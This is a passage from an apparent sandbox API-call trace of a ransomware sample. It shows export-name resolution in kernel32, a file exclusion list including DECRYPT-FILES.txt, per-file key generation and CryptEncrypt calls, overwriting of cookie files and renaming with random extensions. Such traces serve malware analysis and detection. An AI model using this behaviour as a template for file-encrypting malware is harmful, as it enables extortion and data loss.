lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0180.957] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0180.957] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0180.957] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0180.957] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0180.957] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0180.957] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0180.957] lstrcpyA (in: lpString1=0x36fce30, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0180.958] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0180.958] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0180.958] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0180.958] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0180.958] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0180.958] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0180.958] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0180.958] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0180.958] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0180.958] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0180.958] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0180.958] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0180.958] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0180.958] lstrcpyA (in: lpString1=0x36fce30, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0180.958] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0180.958] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh") returned 113 [0180.958] wsprintfW (in: param_1=0x36fdae8, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh.eZ73xO") returned 120 [0180.959] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mvmbcfh"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mVmbcfh.eZ73xO" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[1].txt.mvmbcfh.ez73xo"), dwFlags=0x0) returned 1 [0180.959] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.959] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.960] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.960] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d72bcd0, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e6a4bd0, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab2a0b80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x32f, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", cAlternateFileName="5P5NRG~1.SHU")) returned 1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="DECRYPT-FILES.txt") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="autorun.inf") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="boot.ini") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="desktop.ini") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="ntuser.dat") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="iconcache.db") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="bootsect.bak") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="ntuser.dat.log") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="thumbs.db") returned -1 [0180.960] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF", lpString2="Bootfont.bin") returned -1 [0180.960] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF") returned 38 [0180.960] lstrcmpiW (lpString1="ShuF", lpString2="lnk") returned 1 [0180.960] lstrcmpiW (lpString1="ShuF", lpString2="exe") returned 1 [0180.960] lstrcmpiW (lpString1="ShuF", lpString2="sys") returned -1 [0180.960] lstrcmpiW (lpString1="ShuF", lpString2="dll") returned 1 [0180.960] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.960] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF") returned 38 [0180.960] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0180.960] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF" [0180.960] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.961] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.ShuF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@adobe[3].txt.shuf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.961] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=815) returned 1 [0180.961] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.962] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.962] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.962] CloseHandle (hObject=0x280) returned 1 [0180.962] CloseHandle (hObject=0x27c) returned 1 [0180.962] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.963] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d8f4d50, ftCreationTime.dwHighDateTime=0x1d35d06, ftLastAccessTime.dwLowDateTime=0x1e658910, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xab2ece40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1f9, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", cAlternateFileName="5P5NRG~1.OO3")) returned 1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="DECRYPT-FILES.txt") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="autorun.inf") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="boot.ini") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="desktop.ini") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="ntuser.dat") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="iconcache.db") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="bootsect.bak") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="ntuser.dat.log") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="thumbs.db") returned -1 [0180.963] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8", lpString2="Bootfont.bin") returned -1 [0180.963] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8") returned 40 [0180.963] lstrcmpiW (lpString1="oO3X8", lpString2="lnk") returned 1 [0180.963] lstrcmpiW (lpString1="oO3X8", lpString2="exe") returned 1 [0180.963] lstrcmpiW (lpString1="oO3X8", lpString2="sys") returned -1 [0180.963] lstrcmpiW (lpString1="oO3X8", lpString2="dll") returned 1 [0180.963] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned 72 [0180.963] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8") returned 40 [0180.963] lstrcpyW (in: lpString1=0x36fe2e8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\" [0180.963] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\", lpString2="5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8" [0180.963] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.963] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oO3X8" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\5p5nrgjn0js_halpmcxz@demdex[1].txt.oo3x8"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x27c [0180.964] GetFileSizeEx (in: hFile=0x27c, lpFileSize=0x36fdab0 | out: lpFileSize=0x36fdab0*=505) returned 1 [0180.964] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0180.964] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0180.964] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0180.964] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0180.964] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.965] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fda18*=0x100) returned 1 [0180.965] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0180.965] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.965] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0180.966] CloseHandle (hObject=0x280) returned 1 [0180.966] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0180.966] WriteFile (in: hFile=0x27c, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fda38, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fda38*=0x108, lpOverlapped=0x0) returned 1 [0180.967] CloseHandle (hObject=0x0) returned 0 [0180.967] CloseHandle (hObject=0x27c) returned 1 [0180.967] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.967] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.967] GetTickCount () returned 0x1134ad6 [0180.967] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.968] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0180.968] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0180.968] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0180.968] lstrlenA (lpString="kernel32.dll") returned 12 [0180.968] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0180.968] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0180.968] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0180.968] lstrcpyA (in: lpString1=0x36fce30, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0180.968] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0180.968] lstrcpyA (in: lpString1=0x36fce30, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0180.968] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0180.968] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0180.968] lstrlenA (lpString="ADDATOMA") returned 8 [0180.968] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0180.968] lstrlenA (lpString="ADDATOMW") returned 8 [0180.968] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0180.969] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0180.969] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0180.969] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0180.969] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0180.969] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0180.969] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0180.969] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0180.969] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0180.969] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0180.969] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0180.969] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0180.969] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0180.969] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0180.969] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0180.969] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0180.969] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0180.969] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0180.969] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0180.969] lstrcpyA (in: lpString1=0x36fce30, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0180.969] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0180.970] lstrlenA (lpString="BACKUPREAD") returned 10 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0180.970] lstrlenA (lpString="BACKUPSEEK") returned 10 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0180.970] lstrlenA (lpString="BACKUPWRITE") returned 11 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0180.970] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0180.970] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0180.970] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0180.970] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0180.970] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0180.970] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0180.970] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0180.970] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0180.970] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0180.970] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0180.970] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0180.970] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0180.970] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0180.970] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0180.970] lstrcpyA (in: lpString1=0x36fce30, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0180.970] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0180.970] lstrcpyA (in: lpString1=0x36fce30, 